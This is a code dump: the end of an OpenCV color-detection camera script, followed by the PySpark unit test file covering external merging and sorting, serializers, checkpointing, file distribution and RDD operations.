draw_color = (0, 0, 0)
detect_color = "None"
if move_square:
cv2.putText(img, "Make sure no blocks in the stacking area", (15, int(img.shape[0]/2)), cv2.FONT_HERSHEY_SIMPLEX, 0.9, (0, 0, 255), 2)
cv2.putText(img, "Color: " + detect_color, (10, img.shape[0] - 10), cv2.FONT_HERSHEY_SIMPLEX, 0.65, draw_color, 2)
return img
if __name__ == '__main__':
init()
start()
my_camera = Camera.Camera()
my_camera.camera_open()
while True:
img = my_camera.frame
if img is not None:
frame = img.copy()
Frame = run(frame)
cv2.imshow('Frame', Frame)
key = cv2.waitKey(1)
if key == 27:
break
my_camera.camera_close()
cv2.destroyAllWindows()
|
tests.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
Unit tests for PySpark; additional tests are implemented as doctests in
individual modules.
"""
from array import array
from glob import glob
import os
import re
import shutil
import subprocess
import sys
import tempfile
import time
import zipfile
import random
import threading
import hashlib
from py4j.protocol import Py4JJavaError
if sys.version_info[:2] <= (2, 6):
try:
import unittest2 as unittest
except ImportError:
sys.stderr.write('Please install unittest2 to test with Python 2.6 or earlier')
sys.exit(1)
else:
import unittest
if sys.version_info[0] >= 3:
xrange = range
basestring = str
if sys.version >= "3":
from io import StringIO
else:
from StringIO import StringIO
from pyspark.conf import SparkConf
from pyspark.context import SparkContext
from pyspark.rdd import RDD
from pyspark.files import SparkFiles
from pyspark.serializers import read_int, BatchedSerializer, MarshalSerializer, PickleSerializer, \
CloudPickleSerializer, CompressedSerializer, UTF8Deserializer, NoOpSerializer, \
PairDeserializer, CartesianDeserializer, AutoBatchedSerializer, AutoSerializer, \
FlattenedValuesSerializer
from pyspark.shuffle import Aggregator, ExternalMerger, ExternalSorter
from pyspark import shuffle
from pyspark.profiler import BasicProfiler
_have_scipy = False
_have_numpy = False
try:
import scipy.sparse
_have_scipy = True
except:
# No SciPy, but that's okay, we'll skip those tests
pass
try:
import numpy as np
_have_numpy = True
except:
# No NumPy, but that's okay, we'll skip those tests
pass
SPARK_HOME = os.environ["SPARK_HOME"]
class MergerTests(unittest.TestCase):
def setUp(self):
self.N = 1 << 12
self.l = [i for i in xrange(self.N)]
self.data = list(zip(self.l, self.l))
self.agg = Aggregator(lambda x: [x],
lambda x, y: x.append(y) or x,
lambda x, y: x.extend(y) or x)
def test_small_dataset(self):
m = ExternalMerger(self.agg, 1000)
m.mergeValues(self.data)
self.assertEqual(m.spills, 0)
self.assertEqual(sum(sum(v) for k, v in m.items()),
sum(xrange(self.N)))
m = ExternalMerger(self.agg, 1000)
m.mergeCombiners(map(lambda x_y1: (x_y1[0], [x_y1[1]]), self.data))
self.assertEqual(m.spills, 0)
self.assertEqual(sum(sum(v) for k, v in m.items()),
sum(xrange(self.N)))
def test_medium_dataset(self):
m = ExternalMerger(self.agg, 20)
m.mergeValues(self.data)
self.assertTrue(m.spills >= 1)
self.assertEqual(sum(sum(v) for k, v in m.items()),
sum(xrange(self.N)))
m = ExternalMerger(self.agg, 10)
m.mergeCombiners(map(lambda x_y2: (x_y2[0], [x_y2[1]]), self.data * 3))
self.assertTrue(m.spills >= 1)
self.assertEqual(sum(sum(v) for k, v in m.items()),
sum(xrange(self.N)) * 3)
def test_huge_dataset(self):
m = ExternalMerger(self.agg, 5, partitions=3)
m.mergeCombiners(map(lambda k_v: (k_v[0], [str(k_v[1])]), self.data * 10))
self.assertTrue(m.spills >= 1)
self.assertEqual(sum(len(v) for k, v in m.items()),
self.N * 10)
m._cleanup()
def test_group_by_key(self):
def gen_data(N, step):
for i in range(1, N + 1, step):
for j in range(i):
yield (i, [j])
def gen_gs(N, step=1):
return shuffle.GroupByKey(gen_data(N, step))
self.assertEqual(1, len(list(gen_gs(1))))
self.assertEqual(2, len(list(gen_gs(2))))
self.assertEqual(100, len(list(gen_gs(100))))
self.assertEqual(list(range(1, 101)), [k for k, _ in gen_gs(100)])
self.assertTrue(all(list(range(k)) == list(vs) for k, vs in gen_gs(100)))
for k, vs in gen_gs(50002, 10000):
self.assertEqual(k, len(vs))
self.assertEqual(list(range(k)), list(vs))
ser = PickleSerializer()
l = ser.loads(ser.dumps(list(gen_gs(50002, 30000))))
for k, vs in l:
self.assertEqual(k, len(vs))
self.assertEqual(list(range(k)), list(vs))
class SorterTests(unittest.TestCase):
def test_in_memory_sort(self):
l = list(range(1024))
random.shuffle(l)
sorter = ExternalSorter(1024)
self.assertEqual(sorted(l), list(sorter.sorted(l)))
self.assertEqual(sorted(l, reverse=True), list(sorter.sorted(l, reverse=True)))
self.assertEqual(sorted(l, key=lambda x: -x), list(sorter.sorted(l, key=lambda x: -x)))
self.assertEqual(sorted(l, key=lambda x: -x, reverse=True),
list(sorter.sorted(l, key=lambda x: -x, reverse=True)))
def test_external_sort(self):
class CustomizedSorter(ExternalSorter):
def _next_limit(self):
return self.memory_limit
l = list(range(1024))
random.shuffle(l)
sorter = CustomizedSorter(1)
self.assertEqual(sorted(l), list(sorter.sorted(l)))
self.assertGreater(shuffle.DiskBytesSpilled, 0)
last = shuffle.DiskBytesSpilled
self.assertEqual(sorted(l, reverse=True), list(sorter.sorted(l, reverse=True)))
self.assertGreater(shuffle.DiskBytesSpilled, last)
last = shuffle.DiskBytesSpilled
self.assertEqual(sorted(l, key=lambda x: -x), list(sorter.sorted(l, key=lambda x: -x)))
self.assertGreater(shuffle.DiskBytesSpilled, last)
last = shuffle.DiskBytesSpilled
self.assertEqual(sorted(l, key=lambda x: -x, reverse=True),
list(sorter.sorted(l, key=lambda x: -x, reverse=True)))
self.assertGreater(shuffle.DiskBytesSpilled, last)
def test_external_sort_in_rdd(self):
conf = SparkConf().set("spark.python.worker.memory", "1m")
sc = SparkContext(conf=conf)
l = list(range(10240))
random.shuffle(l)
rdd = sc.parallelize(l, 4)
self.assertEqual(sorted(l), rdd.sortBy(lambda x: x).collect())
sc.stop()
class SerializationTestCase(unittest.TestCase):
def test_namedtuple(self):
from collections import namedtuple
from pickle import dumps, loads
P = namedtuple("P", "x y")
p1 = P(1, 3)
p2 = loads(dumps(p1, 2))
self.assertEqual(p1, p2)
from pyspark.cloudpickle import dumps
P2 = loads(dumps(P))
p3 = P2(1, 3)
self.assertEqual(p1, p3)
def test_itemgetter(self):
from operator import itemgetter
ser = CloudPickleSerializer()
d = range(10)
getter = itemgetter(1)
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
getter = itemgetter(0, 3)
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
def test_attrgetter(self):
from operator import attrgetter
ser = CloudPickleSerializer()
class C(object):
def __getattr__(self, item):
return item
d = C()
getter = attrgetter("a")
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
getter = attrgetter("a", "b")
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
d.e = C()
getter = attrgetter("e.a")
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
getter = attrgetter("e.a", "e.b")
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
# Regression test for SPARK-3415
def test_pickling_file_handles(self):
ser = CloudPickleSerializer()
out1 = sys.stderr
out2 = ser.loads(ser.dumps(out1))
self.assertEqual(out1, out2)
def test_func_globals(self):
class Unpicklable(object):
def __reduce__(self):
raise Exception("not picklable")
global exit
exit = Unpicklable()
ser = CloudPickleSerializer()
self.assertRaises(Exception, lambda: ser.dumps(exit))
def foo():
sys.exit(0)
self.assertTrue("exit" in foo.__code__.co_names)
ser.dumps(foo)
def test_compressed_serializer(self):
ser = CompressedSerializer(PickleSerializer())
try:
from StringIO import StringIO
except ImportError:
from io import BytesIO as StringIO
io = StringIO()
ser.dump_stream(["abc", u"123", range(5)], io)
io.seek(0)
self.assertEqual(["abc", u"123", range(5)], list(ser.load_stream(io)))
ser.dump_stream(range(1000), io)
io.seek(0)
self.assertEqual(["abc", u"123", range(5)] + list(range(1000)), list(ser.load_stream(io)))
io.close()
def test_hash_serializer(self):
hash(NoOpSerializer())
hash(UTF8Deserializer())
hash(PickleSerializer())
hash(MarshalSerializer())
hash(AutoSerializer())
hash(BatchedSerializer(PickleSerializer()))
hash(AutoBatchedSerializer(MarshalSerializer()))
hash(PairDeserializer(NoOpSerializer(), UTF8Deserializer()))
hash(CartesianDeserializer(NoOpSerializer(), UTF8Deserializer()))
hash(CompressedSerializer(PickleSerializer()))
hash(FlattenedValuesSerializer(PickleSerializer()))
class QuietTest(object):
def __init__(self, sc):
self.log4j = sc._jvm.org.apache.log4j
def __enter__(self):
self.old_level = self.log4j.LogManager.getRootLogger().getLevel()
self.log4j.LogManager.getRootLogger().setLevel(self.log4j.Level.FATAL)
def __exit__(self, exc_type, exc_val, exc_tb):
self.log4j.LogManager.getRootLogger().setLevel(self.old_level)
class PySparkTestCase(unittest.TestCase):
def setUp(self):
self._old_sys_path = list(sys.path)
class_name = self.__class__.__name__
self.sc = SparkContext('local[4]', class_name)
def tearDown(self):
self.sc.stop()
sys.path = self._old_sys_path
class ReusedPySparkTestCase(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.sc = SparkContext('local[4]', cls.__name__)
@classmethod
def tearDownClass(cls):
cls.sc.stop()
class CheckpointTests(ReusedPySparkTestCase):
def setUp(self):
self.checkpointDir = tempfile.NamedTemporaryFile(delete=False)
os.unlink(self.checkpointDir.name)
self.sc.setCheckpointDir(self.checkpointDir.name)
def tearDown(self):
shutil.rmtree(self.checkpointDir.name)
def test_basic_checkpointing(self):
parCollection = self.sc.parallelize([1, 2, 3, 4])
flatMappedRDD = parCollection.flatMap(lambda x: range(1, x + 1))
self.assertFalse(flatMappedRDD.isCheckpointed())
self.assertTrue(flatMappedRDD.getCheckpointFile() is None)
flatMappedRDD.checkpoint()
result = flatMappedRDD.collect()
time.sleep(1) # 1 second
self.assertTrue(flatMappedRDD.isCheckpointed())
self.assertEqual(flatMappedRDD.collect(), result)
self.assertEqual("file:" + self.checkpointDir.name,
os.path.dirname(os.path.dirname(flatMappedRDD.getCheckpointFile())))
def test_checkpoint_and_restore(self):
parCollection = self.sc.parallelize([1, 2, 3, 4])
flatMappedRDD = parCollection.flatMap(lambda x: [x])
self.assertFalse(flatMappedRDD.isCheckpointed())
self.assertTrue(flatMappedRDD.getCheckpointFile() is None)
flatMappedRDD.checkpoint()
flatMappedRDD.count() # forces a checkpoint to be computed
time.sleep(1) # 1 second
self.assertTrue(flatMappedRDD.getCheckpointFile() is not None)
recovered = self.sc._checkpointFile(flatMappedRDD.getCheckpointFile(),
flatMappedRDD._jrdd_deserializer)
self.assertEqual([1, 2, 3, 4], recovered.collect())
class AddFileTests(PySparkTestCase):
def test_add_py_file(self):
# To ensure that we're actually testing addPyFile's effects, check that
# this job fails due to `userlibrary` not being on the Python path:
# disable logging in log4j temporarily
def func(x):
from userlibrary import UserClass
return UserClass().hello()
with QuietTest(self.sc):
self.assertRaises(Exception, self.sc.parallelize(range(2)).map(func).first)
# Add the file, so the job should now succeed:
path = os.path.join(SPARK_HOME, "python/test_support/userlibrary.py")
self.sc.addPyFile(path)
res = self.sc.parallelize(range(2)).map(func).first()
self.assertEqual("Hello World!", res)
def test_add_file_locally(self):
path = os.path.join(SPARK_HOME, "python/test_support/hello.txt")
self.sc.addFile(path)
download_path = SparkFiles.get("hello.txt")
self.assertNotEqual(path, download_path)
with open(download_path) as test_file:
self.assertEqual("Hello World!\n", test_file.readline())
def test_add_py_file_locally(self):
# To ensure that we're actually testing addPyFile's effects, check that
# this fails due to `userlibrary` not being on the Python path:
def func():
from userlibrary import UserClass
self.assertRaises(ImportError, func)
path = os.path.join(SPARK_HOME, "python/test_support/userlibrary.py")
self.sc.addPyFile(path)
from userlibrary import UserClass
self.assertEqual("Hello World!", UserClass().hello())
def test_add_egg_file_locally(self):
# To ensure that we're actually testing addPyFile's effects, check that
# this fails due to `userlibrary` not being on the Python path:
def func():
from userlib import UserClass
self.assertRaises(ImportError, func)
path = os.path.join(SPARK_HOME, "python/test_support/userlib-0.1.zip")
self.sc.addPyFile(path)
from userlib import UserClass
self.assertEqual("Hello World from inside a package!", UserClass().hello())
def test_overwrite_system_module(self):
self.sc.addPyFile(os.path.join(SPARK_HOME, "python/test_support/SimpleHTTPServer.py"))
import SimpleHTTPServer
self.assertEqual("My Server", SimpleHTTPServer.__name__)
def func(x):
import SimpleHTTPServer
return SimpleHTTPServer.__name__
self.assertEqual(["My Server"], self.sc.parallelize(range(1)).map(func).collect())
class RDDTests(ReusedPySparkTestCase):
def test_range(self):
self.assertEqual(self.sc.range(1, 1).count(), 0)
self.assertEqual(self.sc.range(1, 0, -1).count(), 1)
self.assertEqual(self.sc.range(0, 1 << 40, 1 << 39).count(), 2)
def test_id(self):
rdd = self.sc.parallelize(range(10))
id = rdd.id()
self.assertEqual(id, rdd.id())
rdd2 = rdd.map(str).filter(bool)
id2 = rdd2.id()
self.assertEqual(id + 1, id2)
self.assertEqual(id2, rdd2.id())
def test_empty_rdd(self):
rdd = self.sc.emptyRDD()
self.assertTrue(rdd.isEmpty())
def test_sum(self):
self.assertEqual(0, self.sc.emptyRDD().sum())
self.assertEqual(6, self.sc.parallelize([1, 2, 3]).sum())
def test_save_as_textfile_with_unicode(self):
# Regression test for SPARK-970
x = u"\u00A1Hola, mundo!"
data = self.sc.parallelize([x])
tempFile = tempfile.NamedTemporaryFile(delete=True)
tempFile.close()
data.saveAsTextFile(tempFile.name)
raw_contents = b''.join(open(p, 'rb').read()
for p in glob(tempFile.name + "/part-0000*"))
self.assertEqual(x, raw_contents.strip().decode("utf-8"))
def test_save_as_textfile_with_utf8(self):
x = u"\u00A1Hola, mundo!"
data = self.sc.parallelize([x.encode("utf-8")])
tempFile = tempfile.NamedTemporaryFile(delete=True)
tempFile.close()
data.saveAsTextFile(tempFile.name)
raw_contents = b''.join(open(p, 'rb').read()
for p in glob(tempFile.name + "/part-0000*"))
self.assertEqual(x, raw_contents.strip().decode('utf8'))
def test_transforming_cartesian_result(self):
# Regression test for SPARK-1034
rdd1 = self.sc.parallelize([1, 2])
rdd2 = self.sc.parallelize([3, 4])
cart = rdd1.cartesian(rdd2)
result = cart.map(lambda x_y3: x_y3[0] + x_y3[1]).collect()
def test_transforming_pickle_file(self):
# Regression test for SPARK-2601
data = self.sc.parallelize([u"Hello", u"World!"])
tempFile = tempfile.NamedTemporaryFile(delete=True)
tempFile.close()
data.saveAsPickleFile(tempFile.name)
pickled_file = self.sc.pickleFile(tempFile.name)
pickled_file.map(lambda x: x).collect()
def test_cartesian_on_textfile(self):
# Regression test for
path = os.path.join(SPARK_HOME, "python/test_support/hello.txt")
a = self.sc.textFile(path)
result = a.cartesian(a).collect()
(x, y) = result[0]
self.assertEqual(u"Hello World!", x.strip())
self.assertEqual(u"Hello World!", y.strip())
def test_deleting_input_files(self):
# Regression test for SPARK-1025
tempFile = tempfile.NamedTemporaryFile(delete=False)
tempFile.write(b"Hello World!")
tempFile.close()
data = self.sc.textFile(tempFile.name)
filtered_data = data.filter(lambda x: True)
self.assertEqual(1, filtered_data.count())
os.unlink(tempFile.name)
with QuietTest(self.sc):
self.assertRaises(Exception, lambda: filtered_data.count())
def test_sampling_default_seed(self):
# Test for SPARK-3995 (default seed setting)
data = self.sc.parallelize(xrange(1000), 1)
subset = data.takeSample(False, 10)
self.assertEqual(len(subset), 10)
def test_aggregate_mutable_zero_value(self):
# Test for SPARK-9021; uses aggregate and treeAggregate to build dict
# representing a counter of ints
# NOTE: dict is used instead of collections.Counter for Python 2.6
# compatibility
from collections import defaultdict
# Show that single or multiple partitions work
data1 = self.sc.range(10, numSlices=1)
data2 = self.sc.range(10, numSlices=2)
def seqOp(x, y):
x[y] += 1
return x
def comboOp(x, y):
for key, val in y.items():
x[key] += val
return x
counts1 = data1.aggregate(defaultdict(int), seqOp, comboOp)
counts2 = data2.aggregate(defaultdict(int), seqOp, comboOp)
counts3 = data1.treeAggregate(defaultdict(int), seqOp, comboOp, 2)
counts4 = data2.treeAggregate(defaultdict(int), seqOp, comboOp, 2)
ground_truth = defaultdict(int, dict((i, 1) for i in range(10)))
self.assertEqual(counts1, ground_truth)
self.assertEqual(counts2, ground_truth)
self.assertEqual(counts3, ground_truth)
self.assertEqual(counts4, ground_truth)
def test_aggregate_by_key_mutable_zero_value(self):
# Test for SPARK-9021; uses aggregateByKey to make a pair RDD that
# contains lists of all values for each key in the original RDD
# list(range(...)) for Python 3.x compatibility (can't use * operator
# on a range object)
# list(zip(...)) for Python 3.x compatibility (want to parallelize a
# collection, not a zip object)
tuples = list(zip(list(range(10))*2, [1]*20))
# Show that single or multiple partitions work
data1 = self.sc.parallelize(tuples, 1)
data2 = self.sc.parallelize(tuples, 2)
def seqOp(x, y):
x.append(y)
return x
def comboOp(x, y):
x.extend(y)
return x
values1 = data1.aggregateByKey([], seqOp, comboOp).collect()
values2 = data2.aggregateByKey([], seqOp, comboOp).collect()
# Sort lists to ensure clean comparison with ground_truth
values1.sort()
values2.sort()
ground_truth = [(i, [1]*2) for i in range(10)]
self.assertEqual(values1, ground_truth)
self.assertEqual(values2, ground_truth)
def test_fold_mutable_zero_value(self):
# Test for SPARK-9021; uses fold to merge an RDD of dict counters into
# a single dict
# NOTE: dict is used instead of collections.Counter for Python 2.6
# compatibility
from collections import defaultdict
counts1 = defaultdict(int, dict((i, 1) for i in range(10)))
counts2 = defaultdict(int, dict((i, 1) for i in range(3, 8)))
counts3 = defaultdict(int, dict((i, 1) for i in range(4, 7)))
counts4 = defaultdict(int, dict((i, 1) for i in range(5, 6)))
all_counts = [counts1, counts2, counts3, counts4]
# Show that single or multiple partitions work
data1 = self.sc.parallelize(all_counts, 1)
data2 = self.sc.parallelize(all_counts, 2)
def comboOp(x, y):
for key, val in y.items():
x[key] += val
return x
fold1 = data1.fold(defaultdict(int), comboOp)
fold2 = data2.fold(defaultdict(int), comboOp)
ground_truth = defaultdict(int)
for counts in all_counts:
for key, val in counts.items():
ground_truth[key] += val
self.assertEqual(fold1, ground_truth)
self.assertEqual(fold2, ground_truth)
def test_fold_by_key_mutable_zero_value(self):
# Test for SPARK-9021; uses foldByKey to make a pair RDD that contains
# lists of all values for each key in the original RDD
tuples = [(i, range(i)) for i in range(10)]*2
# Show that single or multiple partitions work
data1 = self.sc.parallelize(tuples, 1)
data2 = self.sc.parallelize(tuples, 2)
def comboOp(x, y):
x.extend(y)
return x
values1 = data1.foldByKey([], comboOp).collect()
values2 = data2.foldByKey([], comboOp).collect()
# Sort lists to ensure clean comparison with ground_truth
values1.sort()
values2.sort()
# list(range(...)) for Python 3.x compatibility
ground_truth = [(i, list(range(i))*2) for i in range(10)]
self.assertEqual(values1, ground_truth)
self.assertEqual(values2, ground_truth)
def test_aggregate_by_key(self):
data = self.sc.parallelize([(1, 1), (1, 1), (3, 2), (5, 1), (5, 3)], 2)
def seqOp(x, y):
x.add(y)
return x
def combOp(x, y):
x |= y
return x
sets = dict(data.aggregateByKey(set(), seqOp, combOp).collect())
self.assertEqual(3, len(sets))
self.assertEqual(set([1]), sets[1])
self.assertEqual(set([2]), sets[3])
self.assertEqual(set([1, 3]), sets[5])
def test_itemgetter(self):
rdd = self.sc.parallelize([range(10)])
from operator import itemgetter
self.assertEqual([1], rdd.map(itemgetter(1)).collect())
self.assertEqual([(2, 3)], rdd.map(itemgetter(2, 3)).collect())
def test_namedtuple_in_rdd(self):
from collections import namedtuple
Person = namedtuple("Person", "id firstName lastName")
jon = Person(1, "Jon", "Doe")
jane = Person(2, "Jane", "Doe")
theDoes = self.sc.parallelize([jon, jane])
self.assertEqual([jon, jane], theDoes.collect())
def test_large_broadcast(self):
N = 10000
data = [[float(i) for i in range(300)] for i in range(N)]
bdata = self.sc.broadcast(data) # 27MB
m = self.sc.parallelize(range(1), 1).map(lambda x: len(bdata.value)).sum()
self.assertEqual(N, m)
def test_multiple_broadcasts(self):
N = 1 << 21
b1 = self.sc.broadcast(set(range(N))) # multiple blocks in JVM
r = list(range(1 << 15))
random.shuffle(r)
s = str(r).encode()
checksum = hashlib.md5(s).hexdigest()
b2 = self.sc.broadcast(s)
r = list(set(self.sc.parallelize(range(10), 10).map(
lambda x: (len(b1.value), hashlib.md5(b2.value).hexdigest())).collect()))
self.assertEqual(1, len(r))
size, csum = r[0]
self.assertEqual(N, size)
self.assertEqual(checksum, csum)
random.shuffle(r)
s = str(r).encode()
checksum = hashlib.md5(s).hexdigest()
b2 = self.sc.broadcast(s)
r = list(set(self.sc.parallelize(range(10), 10).map(
lambda x: (len(b1.value), hashlib.md5(b2.value).hexdigest())).collect()))
self.assertEqual(1, len(r))
size, csum = r[0]
self.assertEqual(N, size)
self.assertEqual(checksum, csum)
def test_large_closure(self):
N = 200000
data = [float(i) for i in xrange(N)]
rdd = self.sc.parallelize(range(1), 1).map(lambda x: len(data))
self.assertEqual(N, rdd.first())
# regression test for SPARK-6886
self.assertEqual(1, rdd.map(lambda x: (x, 1)).groupByKey().count())
def test_zip_with_different_serializers(self):
a = self.sc.parallelize(range(5))
b = self.sc.parallelize(range(100, 105))
self.assertEqual(a.zip(b).collect(), [(0, 100), (1, 101), (2, 102), (3, 103), (4, 104)])
a = a._reserialize(BatchedSerializer(PickleSerializer(), 2))
b = b._reserialize(MarshalSerializer())
self.assertEqual(a.zip(b).collect(), [(0, 100), (1, 101), (2, 102), (3, 103), (4, 104)])
# regression test for SPARK-4841
path = os.path.join(SPARK_HOME, "python/test_support/hello.txt")
t = self.sc.textFile(path)
cnt = t.count()
self.assertEqual(cnt, t.zip(t).count())
rdd = t.map(str)
self.assertEqual(cnt, t.zip(rdd).count())
# regression test for bug in _reserializer()
self.assertEqual(cnt, t.zip(rdd).count())
def test_zip_with_different_object_sizes(self):
# regress test for SPARK-5973
a = self.sc.parallelize(xrange(10000)).map(lambda i: '*' * i)
b = self.sc.parallelize(xrange(10000, 20000)).map(lambda i: '*' * i)
self.assertEqual(10000, a.zip(b).count())
def test_zip_with_different_number_of_items(self):
a = self.sc.parallelize(range(5), 2)
# different number of partitions
b = self.sc.parallelize(range(100, 106), 3)
self.assertRaises(ValueError, lambda: a.zip(b))
with QuietTest(self.sc):
# different number of batched items in JVM
b = self.sc.parallelize(range(100, 104), 2)
self.assertRaises(Exception, lambda: a.zip(b).count())
# different number of items in one pair
b = self.sc.parallelize(range(100, 106), 2)
self.assertRaises(Exception, lambda: a.zip(b).count())
# same total number of items, but different distributions
a = self.sc.parallelize([2, 3], 2).flatMap(range)
b = self.sc.parallelize([3, 2], 2).flatMap(range)
self.assertEqual(a.count(), b.count())
self.assertRaises(Exception, lambda: a.zip(b).count())
def test_count_approx_distinct(self):
rdd = self.sc.parallelize(xrange(1000))
self.assertTrue(950 < rdd.countApproxDistinct(0.03) < 1050)
self.assertTrue(950 < rdd.map(float).countApproxDistinct(0.03) < 1050)
self.assertTrue(950 < rdd.map(str).countApproxDistinct(0.03) < 1050)
self.assertTrue(950 < rdd.map(lambda x: (x, -x)).countApproxDistinct(0.03) < 1050)
rdd = self.sc.parallelize([i % 20 for i in range(1000)], 7)
self.assertTrue(18 < rdd.countApproxDistinct() < 22)
self.assertTrue(18 < rdd.map(float).countApproxDistinct() < 22)
self.assertTrue(18 < rdd.map(str).countApproxDistinct() < 22)
self.assertTrue(18 < rdd.map(lambda x: (x, -x)).countApproxDistinct() < 22)
self.assertRaises(ValueError, lambda: rdd.countApproxDistinct(0.00000001))
def test_histogram(self):
# empty
rdd = self.sc.parallelize([])
self.assertEqual([0], rdd.histogram([0, 10])[1])
self.assertEqual([0, 0], rdd.histogram([0, 4, 10])[1])
self.assertRaises(ValueError, lambda: rdd.histogram(1))
# out of range
rdd = self.sc.parallelize([10.01, -0.01])
self.assertEqual([0], rdd.histogram([0, 10])[1])
self.assertEqual([0, 0], rdd.histogram((0, 4, 10))[1])
# in range with one bucket
rdd = self.sc.parallelize(range(1, 5))
self.assertEqual([4], rdd.histogram([0, 10])[1])
self.assertEqual([3, 1], rdd.histogram([0, 4, 10])[1])
# in range with one bucket exact match
self.assertEqual([4], rdd.histogram([1, 4])[1])
# out of range with two buckets
rdd = self.sc.parallelize([10.01, -0.01])
self.assertEqual([0, 0], rdd.histogram([0, 5, 10])[1])
# out of range with two uneven buckets
rdd = self.sc.parallelize([10.01, -0.01])
self.assertEqual([0, 0], rdd.histogram([0, 4, 10])[1])
# in range with two buckets
rdd = self.sc.parallelize([1, 2, 3, 5, 6])
self.assertEqual([3, 2], rdd.histogram([0, 5, 10])[1])
# in range with two bucket and None
rdd = self.sc.parallelize([1, 2, 3, 5, 6, None, float('nan')])
self.assertEqual([3, 2], rdd.histogram([0, 5, 10])[1])
# in range with two uneven buckets
rdd = self.sc.parallelize([1, 2, 3, 5, 6])
self.assertEqual([3, 2], rdd.histogram([0, 5, 11])[1])
# mixed range with two uneven buckets
rdd = self.sc.parallelize([-0.01, 0.0, 1, 2, 3, 5, 6, 11.0, 11.01])
self.assertEqual([4, 3], rdd.histogram([0, 5, 11])[1])
# mixed range with four uneven buckets
rdd = self.sc.parallelize([-0.01, 0.0, 1, 2, 3, 5, 6, 11.01, 12.0, 199.0, 200.0, 200.1])
self.assertEqual([4, 2, 1, 3], rdd.histogram([0.0, 5.0, 11.0, 12.0, 200.0])[1])
# mixed range with uneven buckets and NaN
rdd = self.sc.parallelize([-0.01, 0.0, 1, 2, 3, 5, 6, 11.01, 12.0,
199.0, 200.0, 200.1, None, float('nan')])
self.assertEqual([4, 2, 1, 3], rdd.histogram([0.0, 5.0, 11.0, 12.0, 200.0])[1])
# out of range with infinite buckets
rdd = self.sc.parallelize([10.01, -0.01, float('nan'), float("inf")])
self.assertEqual([1, 2], rdd.histogram([float('-inf'), 0, float('inf')])[1])
# invalid buckets
self.assertRaises(ValueError, lambda: rdd.histogram([]))
self.assertRaises(ValueError, lambda: rdd.histogram([1]))
self.assertRaises(ValueError, lambda: rdd.histogram(0))
self.assertRaises(TypeError, lambda: rdd.histogram({}))
# without buckets
rdd = self.sc.parallelize(range(1, 5))
self.assertEqual(([1, 4], [4]), rdd.histogram(1))
# without buckets single element
rdd = self.sc.parallelize([1])
self.assertEqual(([1, 1], [1]), rdd.histogram(1))
# without bucket no range
rdd = self.sc.parallelize([1] * 4)
self.assertEqual(([1, 1], [4]), rdd.histogram(1))
# without buckets basic two
rdd = self.sc.parallelize(range(1, 5))
self.assertEqual(([1, 2.5, 4], [2, 2]), rdd.histogram(2))
# without buckets with more requested than elements
rdd = self.sc.parallelize([1, 2])
buckets = [1 + 0.2 * i for i in range(6)]
hist = [1, 0, 0, 0, 1]
self.assertEqual((buckets, hist), rdd.histogram(5))
# invalid RDDs
rdd = self.sc.parallelize([1, float('inf')])
self.assertRaises(ValueError, lambda: rdd.histogram(2))
rdd = self.sc.parallelize([float('nan')])
self.assertRaises(ValueError, lambda: rdd.histogram(2))
# string
rdd = self.sc.parallelize(["ab", "ac", "b", "bd", "ef"], 2)
self.assertEqual([2, 2], rdd.histogram(["a", "b", "c"])[1])
self.assertEqual((["ab", "ef"], [5]), rdd.histogram(1))
self.assertRaises(TypeError, lambda: rdd.histogram(2))
def test_repartitionAndSortWithinPartitions(self):
rdd = self.sc.parallelize([(0, 5), (3, 8), (2, 6), (0, 8), (3, 8), (1, 3)], 2)
repartitioned = rdd.repartitionAndSortWithinPartitions(2, lambda key: key % 2)
partitions = repartitioned.glom().collect()
self.assertEqual(partitions[0], [(0, 5), (0, 8), (2, 6)])
self.assertEqual(partitions[1], [(1, 3), (3, 8), (3, 8)])
def test_distinct(self):
rdd = self.sc.parallelize((1, 2, 3)*10, 10)
self.assertEqual(rdd.getNumPartitions(), 10)
self.assertEqual(rdd.distinct().count(), 3)
result = rdd.distinct(5)
self.assertEqual(result.getNumPartitions(), 5)
self.assertEqual(result.count(), 3)
def test_external_group_by_key(self):
self.sc._conf.set("spark.python.worker.memory", "1m")
N = 200001
kv = self.sc.parallelize(xrange(N)).map(lambda x: (x % 3, x))
gkv = kv.groupByKey().cache()
self.assertEqual(3, gkv.count())
filtered = gkv.filter(lambda kv: kv[0] == 1)
self.assertEqual(1, filtered.count())
self.assertEqual([(1, N // 3)], filtered.mapValues(len).collect())
self.assertEqual([(N // 3, N // 3)],
filtered.values().map(lambda x: (len(x), len(list(x)))).collect())
result = filtered.collect()[0][1]
self.assertEqual(N // 3, len(result))
self.assertTrue(isinstance(result.data, shuffle.ExternalListOfList))
def test_sort_on_empty_rdd(self):
self.assertEqual([], self.sc.parallelize(zip([], [])).sortByKey().collect())
def test_sample(self):
rdd = self.sc.parallelize(range(0, 100), 4)
wo = rdd.sample(False, 0.1, 2).collect()
wo_dup = rdd.sample(False, 0.1, 2).collect()
self.assertSetEqual(set(wo), set(wo_dup))
wr = rdd.sample(True, 0.2, 5).collect()
wr_dup = rdd.sample(True, 0.2, 5).collect()
self.assertSetEqual(set(wr), set(wr_dup))
wo_s10 = rdd.sample(False, 0.3, 10).collect()
wo_s20 = rdd.sample(False, 0.3, 20).collect()
self.assertNotEqual(set(wo_s10), set(wo_s20))
wr_s11 = rdd.sample(True, 0.4, 11).collect()
wr_s21 = rdd.sample(True, 0.4, 21).collect()
self.assertNotEqual(set(wr_s11), set(wr_s21))
